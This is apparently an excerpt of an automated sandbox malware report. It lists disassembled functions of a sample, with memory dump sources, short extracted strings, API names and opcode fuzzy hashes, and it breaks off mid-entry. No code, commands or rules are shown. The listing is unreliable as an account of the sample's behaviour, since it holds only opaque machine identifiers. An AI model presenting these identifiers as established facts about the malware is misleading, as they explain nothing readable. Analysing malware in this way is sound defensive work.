                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1719999080.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_SPFFah2O2q.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: ,JHj$Hs$bc$v
                                                                                                                                                                                                                                                                • API String ID: 0-909542228
                                                                                                                                                                                                                                                                • Opcode ID: d2c01644c1b783dc07337eb5961086e4655b708d6c2de64b3f2482e035b941c1
                                                                                                                                                                                                                                                                • Instruction ID: f1dd0e060a49988aa5914a4bcfde423beaa814ce8563699fb3410ac54fff71cf
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d2c01644c1b783dc07337eb5961086e4655b708d6c2de64b3f2482e035b941c1
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 89918E71A1C3A08BE3358F3594517ABBFD2AFD3314F58896EC4C99B382C6794405CB96
                                                                                                                                                                                                                                                                Function 0211CD37 Relevance: 5.3, Strings: 4, Instructions: 295COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1722458001.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_20f0000_SPFFah2O2q.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: ,JHj$Hs$bc$v
                                                                                                                                                                                                                                                                • API String ID: 0-909542228
                                                                                                                                                                                                                                                                • Opcode ID: d2c01644c1b783dc07337eb5961086e4655b708d6c2de64b3f2482e035b941c1
                                                                                                                                                                                                                                                                • Instruction ID: 36397b7e55a883d6b87c5cd0a7d65654782b6574d78f41d388baed68983f9f9d
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d2c01644c1b783dc07337eb5961086e4655b708d6c2de64b3f2482e035b941c1
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3B917971A4C3D18BE3348B3984517ABBBD2AFD3314F28896DD4D99B682CB754409CB93
                                                                                                                                                                                                                                                                Function 0042CB11 Relevance: 5.3, Strings: 4, Instructions: 271COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1719999080.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1719999080.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_SPFFah2O2q.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: ,JHj$Hs$bc$v
                                                                                                                                                                                                                                                                • API String ID: 0-909542228
                                                                                                                                                                                                                                                                • Opcode ID: 3d500b1000b7ad2bbd92419dc8dce251e5a9dd8a0e3fad46196f1295967bd69e
                                                                                                                                                                                                                                                                • Instruction ID: 1e9c0ee7827ae846e03c62aab54aec301621c39cdfcdcbd3b33c3bf2ddd67d6a
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3d500b1000b7ad2bbd92419dc8dce251e5a9dd8a0e3fad46196f1295967bd69e
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4B814871A1C3A08BE3358F3994517ABBFD2AFE3314F59896DC4C94B386C6784409CB96
                                                                                                                                                                                                                                                                Function 0211CD78 Relevance: 5.3, Strings: 4, Instructions: 271COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1722458001.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_20f0000_SPFFah2O2q.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: ,JHj$Hs$bc$v
                                                                                                                                                                                                                                                                • API String ID: 0-909542228
                                                                                                                                                                                                                                                                • Opcode ID: 3d500b1000b7ad2bbd92419dc8dce251e5a9dd8a0e3fad46196f1295967bd69e
                                                                                                                                                                                                                                                                • Instruction ID: 459fd79cac7b3ca90d0cc701004315c693055f310fd5318d386fc34bb6f4def2
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3d500b1000b7ad2bbd92419dc8dce251e5a9dd8a0e3fad46196f1295967bd69e
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8A8157729483D08FE3348F3988507ABBBD2AFE3204F29896DC4D95B682C7754409CB93
                                                                                                                                                                                                                                                                Function 02114031 Relevance: 5.1, Strings: 4, Instructions: 86COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1722458001.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_20f0000_SPFFah2O2q.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: /G$I$7N1@$Fg)i${\}
                                                                                                                                                                                                                                                                • API String ID: 0-149357369
                                                                                                                                                                                                                                                                • Opcode ID: f8d948a9f8c2ec87f02193c7bcc93b1dfc54c6f05a1ef69b06e5b5d54ec4d898
                                                                                                                                                                                                                                                                • Instruction ID: adfd10be52cf66e349c3f9ebf5e4baaa487f184ef0fe8a27018f625dd380e623
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f8d948a9f8c2ec87f02193c7bcc93b1dfc54c6f05a1ef69b06e5b5d54ec4d898
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8321B8B55593809BC314CF66884161BFBE2BBD2704F29A92CE0C85B254D3748902CF8B
                                                                                                                                                                                                                                                                Function 00417DEE Relevance: 4.7, Strings: 3, Instructions: 998COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1719999080.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1719999080.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_SPFFah2O2q.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                                                                                                • String ID: ,$i$r}A
                                                                                                                                                                                                                                                                • API String ID: 2994545307-2114006112
                                                                                                                                                                                                                                                                • Opcode ID: 0e4b36d0337e01a9c7c8ce5630e9dd0ade0f1867cda4b4963c273f19514711e6
                                                                                                                                                                                                                                                                • Instruction ID: 71abf614919c99122684cd8b50d12f0618c33dd175a6392faed4f31dbac36a6d
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0e4b36d0337e01a9c7c8ce5630e9dd0ade0f1867cda4b4963c273f19514711e6
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 90427976A087508FD324CF69D8807ABBBE2EB96300F1D492ED4D5A7352C7389845C796
                                                                                                                                                                                                                                                                Function 0041759F Relevance: 4.4, Strings: 3, Instructions: 671COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1719999080.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1719999080.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_SPFFah2O2q.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: gfff$i$r}A
                                                                                                                                                                                                                                                                • API String ID: 0-3931832132
                                                                                                                                                                                                                                                                • Opcode ID: 63d4f06d283b13aa9aabc31ef275959d287b6dadcbde27f9351af1790c00577d
                                                                                                                                                                                                                                                                • Instruction ID: 86030a502c6fbeff1aeb5632b982c99bae1c365f88ce42af9c09e5b1275022bd
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 63d4f06d283b13aa9aabc31ef275959d287b6dadcbde27f9351af1790c00577d
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 74028A76A483118BD724CF28D8817ABBBE2EBD2300F19852ED4C5D7392DB389945C786
                                                                                                                                                                                                                                                                Function 00422510 Relevance: 4.2, Strings: 3, Instructions: 454COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1719999080.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1719999080.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_SPFFah2O2q.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: <pr$st$y./
                                                                                                                                                                                                                                                                • API String ID: 0-3839595785
                                                                                                                                                                                                                                                                • Opcode ID: a785fe897820364b60474d4d38e44689b11c67a14769611824ea7061f52dc378
                                                                                                                                                                                                                                                                • Instruction ID: 75883d3ccedddef3a45dabbf5554b36173ac4c5341f315a2b5b284ed2e941cbb
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a785fe897820364b60474d4d38e44689b11c67a14769611824ea7061f52dc378
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A6C16872B083206BD7149B25D95263BB3E1EFD4314F59852EE88697381E6BCD805C39A
                                                                                                                                                                                                                                                                Function 02112777 Relevance: 4.2, Strings: 3, Instructions: 454COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1722458001.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_20f0000_SPFFah2O2q.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: <pr$st$y./
                                                                                                                                                                                                                                                                • API String ID: 0-3839595785
                                                                                                                                                                                                                                                                • Opcode ID: 9e143f35872cbb7a2f64fee134240a1c59abbcbee3e9395d2d3f1030c864cd5b
                                                                                                                                                                                                                                                                • Instruction ID: 7676cd6c6d452e7f6ea5ef86fdbb70807a0855253111ee150c956dcafde4b5fc
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9e143f35872cbb7a2f64fee134240a1c59abbcbee3e9395d2d3f1030c864cd5b
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 28C15972A883214BD7289F24C852B6BB3E2EFD5314F19853DED9687781E374D805C792
                                                                                                                                                                                                                                                                Function 0041D380 Relevance: 4.2, Strings: 3, Instructions: 453COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1719999080.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1719999080.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_SPFFah2O2q.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: 34$C]$|F
                                                                                                                                                                                                                                                                • API String ID: 0-2804560523
                                                                                                                                                                                                                                                                • Opcode ID: 7bec5bc3369f6adcf9dfe2aa521af371a2ac693f70b7f14cbe9fa8a8d0a997b9
                                                                                                                                                                                                                                                                • Instruction ID: 2c432fa7c5999ab476cb5019d0599193357fe59285c965ab9162d9f100ef16a5
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7bec5bc3369f6adcf9dfe2aa521af371a2ac693f70b7f14cbe9fa8a8d0a997b9
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E2C1F1B59183118BC720CF28C8816ABB3F2FFD5314F58895DE8D58B390E778A945C79A
                                                                                                                                                                                                                                                                Function 00418792 Relevance: 4.1, Strings: 3, Instructions: 378COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1719999080.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1719999080.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_SPFFah2O2q.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: #XXL$=$BC
                                                                                                                                                                                                                                                                • API String ID: 0-2546488661
                                                                                                                                                                                                                                                                • Opcode ID: de1a02a15010d669723b7442fb5946c988934c5b7e4ce427fae25988c8326dc7
                                                                                                                                                                                                                                                                • Instruction ID: 9bd2012f957da0ff56630068cab070879dad6f1475f4ae026007fe123ff5be4b
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: de1a02a15010d669723b7442fb5946c988934c5b7e4ce427fae25988c8326dc7
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 62C1EBB15083518BD324CF15C8A17ABBBE2FFD1704F0A895ED4C55B3A1EBB88845CB96
                                                                                                                                                                                                                                                                Function 0043F720 Relevance: 4.1, Strings: 3, Instructions: 364COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1719999080.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1719999080.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_SPFFah2O2q.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                                                                                                • String ID: 1234$oQ3$sQ3
                                                                                                                                                                                                                                                                • API String ID: 2994545307-3057079318
                                                                                                                                                                                                                                                                • Opcode ID: a6f3f14e2653e663308f11d691e247aa7faefb8ce40ce58f1613db28e40f636f
                                                                                                                                                                                                                                                                • Instruction ID: 8038275947b79c29346f8cf0c7e67bd1178385f5d69ec54105c16415a8137388
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a6f3f14e2653e663308f11d691e247aa7faefb8ce40ce58f1613db28e40f636f
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8DB16472A083118FC728DF28C89056BB7E2EBC9314F19853DE99697365E735ED05CB82
                                                                                                                                                                                                                                                                Function 0212F987 Relevance: 4.1, Strings: 3, Instructions: 364COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1722458001.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_20f0000_SPFFah2O2q.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: 12347$oQ3$sQ3
                                                                                                                                                                                                                                                                • API String ID: 0-1755585375
                                                                                                                                                                                                                                                                • Opcode ID: d6219592765054223d8b44a29d17a2c15be9e83531692649a6c6d0283300f812
                                                                                                                                                                                                                                                                • Instruction ID: e410d00138f0985a48c97a162f822da708af15313ec20ce4b8c4cd63b46878de
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d6219592765054223d8b44a29d17a2c15be9e83531692649a6c6d0283300f812
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E6B14632A483658FC728CF28C89096BB7E2EBC5304F1A852CE99697751D731ED16C782
                                                                                                                                                                                                                                                                Function 0042DFE9 Relevance: 4.1, Strings: 3, Instructions: 332COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1719999080.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1719999080.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_SPFFah2O2q.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: Ef$TQ][$sWK)
                                                                                                                                                                                                                                                                • API String ID: 0-3401374238
                                                                                                                                                                                                                                                                • Opcode ID: 2018eb1ddcc6c4d2b6b82b9d22d54321858e2bd23606dd915e7f156b5046d053
                                                                                                                                                                                                                                                                • Instruction ID: 19a0c778187f2748ae17dd07c5e08606c1358576a23e797e2c0b4f31c76305c1
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2018eb1ddcc6c4d2b6b82b9d22d54321858e2bd23606dd915e7f156b5046d053
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: CBB1C33061C3E08ED7398F2994507ABBBE09F97304F48499DD4D95B382DB79850ACBA7
                                                                                                                                                                                                                                                                Function 0211E250 Relevance: 4.1, Strings: 3, Instructions: 332COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1722458001.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_20f0000_SPFFah2O2q.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: Ef$TQ][$sWK)
                                                                                                                                                                                                                                                                • API String ID: 0-3401374238
                                                                                                                                                                                                                                                                • Opcode ID: 34b98bce0e098604bc8c30d8401df6549c9b0a7e4ea807236a6bc4bf95e6afdf
                                                                                                                                                                                                                                                                • Instruction ID: 66b4b13619398bb5dbf594b141494d51523084d4f41b2717f6649768b10bd6e1
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 34b98bce0e098604bc8c30d8401df6549c9b0a7e4ea807236a6bc4bf95e6afdf
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A0B1F43055D3D08ED7398F29D4907ABBBE0AF97304F0889ADD4D95B282D775850ACB63
                                                                                                                                                                                                                                                                Function 0041B2E0 Relevance: 4.0, Strings: 3, Instructions: 231COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1719999080.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1719999080.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_SPFFah2O2q.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: +|-~$/pqr$_
                                                                                                                                                                                                                                                                • API String ID: 0-1379640984
                                                                                                                                                                                                                                                                • Opcode ID: 4a5a7f83b503959aed81fc9274c5a394571bb0f6731898145231dc30ce1a0eba
                                                                                                                                                                                                                                                                • Instruction ID: 042a524babaaaf1240c13a88dd3a117b8cd22f0ed9ec4b151ea40a3d869026f8
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4a5a7f83b503959aed81fc9274c5a394571bb0f6731898145231dc30ce1a0eba
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D9810A5561495006DB2CDF3489A333BAAD79F84308B2991BFC995CFBABE93CC502874D
                                                                                                                                                                                                                                                                Function 0210B547 Relevance: 4.0, Strings: 3, Instructions: 231COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1722458001.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_20f0000_SPFFah2O2q.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: +|-~$/pqr$_
                                                                                                                                                                                                                                                                • API String ID: 0-1379640984
                                                                                                                                                                                                                                                                • Opcode ID: 6cec998220da979fd4d7e4802d464de526f10a737984141f1598214dad803a78
                                                                                                                                                                                                                                                                • Instruction ID: 668d1ac3bc39d74cb45678efa93b410941d00949a57aa546889d0371d83afed0
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6cec998220da979fd4d7e4802d464de526f10a737984141f1598214dad803a78
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D7812C5560469005DB2CDF3888A377BB9D79F84308B2DD1BEC955CFEA6E938C102874D
                                                                                                                                                                                                                                                                Function 020F092B Relevance: 3.8, Strings: 3, Instructions: 90COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1722458001.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_20f0000_SPFFah2O2q.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: .$GetProcAddress.$l
                                                                                                                                                                                                                                                                • API String ID: 0-2784972518
                                                                                                                                                                                                                                                                • Opcode ID: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                                                                                                                                                                                                                                                • Instruction ID: 47799c3eb4f41998aaec55d70cb5b8d5507aece2028a522da9ac79aad1f6e4cc
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 883168B6904709CFEB51CF99C880AAEBBFAFF08324F14404AD941A7615D771EA45CBA4
                                                                                                                                                                                                                                                                Function 02105FD3 Relevance: 3.8, Strings: 3, Instructions: 37COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1722458001.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_20f0000_SPFFah2O2q.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: NDNK$WJeX$X
                                                                                                                                                                                                                                                                • API String ID: 0-3631875968
                                                                                                                                                                                                                                                                • Opcode ID: d11f5f5163d6808065bde529015e1f128c891bcdaf4957bf72f467d8a2f5d03f
                                                                                                                                                                                                                                                                • Instruction ID: f07463eddd417ebef97773e77290fa83910db116e226481feeac36149840f979
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d11f5f5163d6808065bde529015e1f128c891bcdaf4957bf72f467d8a2f5d03f
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B101DFB051D790CFD3B19F259899A9FBFE4AB83710F21492CC5D9AB211DB3688008F03
                                                                                                                                                                                                                                                                Function 00425327 Relevance: 3.2, Strings: 2, Instructions: 742COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1719999080.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1719999080.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_SPFFah2O2q.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: "51s$9YB
                                                                                                                                                                                                                                                                • API String ID: 0-2722061943
                                                                                                                                                                                                                                                                • Opcode ID: 211a046e9116838b58fef2f862f3bc43e5d0a454b8724f73db8adee7e8caa559
                                                                                                                                                                                                                                                                • Instruction ID: 779a5c1bb40158b59da43047085edf677e041d4ba635d65d9609cd33f89ab022
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 211a046e9116838b58fef2f862f3bc43e5d0a454b8724f73db8adee7e8caa559
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: EE321976B00622CBCB24CF68D8516BFB3B2FF89310B99856DD442AB364DB395D41CB54
                                                                                                                                                                                                                                                                Function 02111B07 Relevance: 3.2, Strings: 2, Instructions: 655COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1722458001.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_20f0000_SPFFah2O2q.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: !@$,
                                                                                                                                                                                                                                                                • API String ID: 0-2321553346
                                                                                                                                                                                                                                                                • Opcode ID: 53d5da5660c4a43f8d0f64280c8733e9bdccf6cbe85e2db49c8b0f6515059a90
                                                                                                                                                                                                                                                                • Instruction ID: 8ac1d75e3f18f3ca06c62006bbbcc1f171d82c91a9559449bc6cc08738e70f09
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 53d5da5660c4a43f8d0f64280c8733e9bdccf6cbe85e2db49c8b0f6515059a90
